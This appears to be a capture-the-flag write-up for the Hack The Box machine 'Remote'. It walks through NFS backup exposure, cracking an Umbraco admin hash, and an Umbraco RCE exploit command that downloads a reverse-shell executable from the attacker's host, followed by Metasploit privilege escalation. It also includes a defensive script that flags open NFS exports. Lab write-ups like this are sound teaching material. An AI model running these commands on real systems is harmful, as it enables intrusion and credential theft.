Remote


Port Scanning and general enumeration (Nmap, Umbraco)

nmap -sC -sV -oN nmap/initial -T4 10.10.10.180


Interesting. FTP, a web server and maybe some NFS shares we can mount?

Let’s take a look at the site


Looks like some sort of blog.. ‘Umbraco’?


So we’ve found a login form. Nice. Default creds didn’t work, so we’ll come back to this.

Let’s see if there’s anything to mount


Interesting! Let’s mount it

sudo mount -t nfs 10.10.10.180:/site_backups /path/to/where/you/want/to/save/it

Full site backup!
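Seen from the defender's side, the finding above is an NFS export that any client may mount. The following is an added example, not part of the original write-up: it parses `showmount -e` output and flags exports with an unrestricted client entry. The function names and the sample output are constructed for illustration.

```python
"""Flag NFS exports that any client can mount, from `showmount -e` output."""
import ipaddress

# Client specs that mean "no restriction". "(everyone)" is how showmount
# renders an unrestricted export; "*" is the wildcard form used in /etc/exports.
OPEN_SPECS = {"(everyone)", "everyone", "*"}


def is_open_client(spec: str) -> bool:
    """True if one client spec matches every possible host."""
    spec = spec.strip()
    if spec.lower() in OPEN_SPECS:
        return True
    try:
        # A /0 network covers all addresses, e.g. 0.0.0.0/0 or ::/0.
        return ipaddress.ip_network(spec, strict=False).prefixlen == 0
    except ValueError:
        return False  # hostname, netgroup or pattern: treated as restricted


def open_exports(showmount_output: str) -> list[str]:
    """Return export paths whose client list includes an unrestricted entry."""
    flagged = []
    for line in showmount_output.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        # Line format: <path><whitespace><client>[,<client>...]
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else []
        if any(is_open_client(c) for c in clients):
            flagged.append(path)
    return flagged


# Constructed sample output (not captured from a real host).
SAMPLE = """Export list for fileserver.example:
/site_backups (everyone)
/srv/build    10.0.5.0/24,10.0.6.12
/srv/scratch  10.0.5.0/24,*
/srv/legacy   0.0.0.0/0
"""

if __name__ == "__main__":
    for path in open_exports(SAMPLE):
        print(f"OPEN EXPORT: {path}")
```

Any path it reports should either be restricted to named clients or checked for content such as configuration files and application databases before it stays exported.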

Since we know the backend is Umbraco, we can find the version in the Web.config file and credentials in the App_Data/Umbraco.sdf file.

Version:


To get the credentials we can run strings on the Umbraco.sdf file, redirect the output to a file and run head on that file.


So the admin password is a SHA1 hash. Let’s crack it and log in using Admin@htb.local:cracked-password in the forms we found earlier.


Access (Umbraco RCE, msfvenom)

So now that we’re authenticated we have a little more room to play with things. I found this Umbraco RCE script that should be perfect


Nice! So now we have remote code execution. Let’s get a proper shell


Stand up a simple Python HTTP server and use the exploit to transfer our executable to the machine

python3 exploit.py -u admin@htb.local -p password -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri http://10.10.14.22:8000/rev.exe -OutFile C:/Users/Public/rev.exe'

Now that our shell is on the box, let’s fire up a Metasploit listener


Trigger the shell and off we go


Privesc (winPEAS, evil-winrm)

Now that we’re on the box, let’s do some enumeration. I like winPEAS

Upload and run it


Interesting. TeamViewer 7 also has a Metasploit module. Let’s see what that has for us

Background your meterpreter session and


Could that be the Admin password? Let’s check using evil-winrm
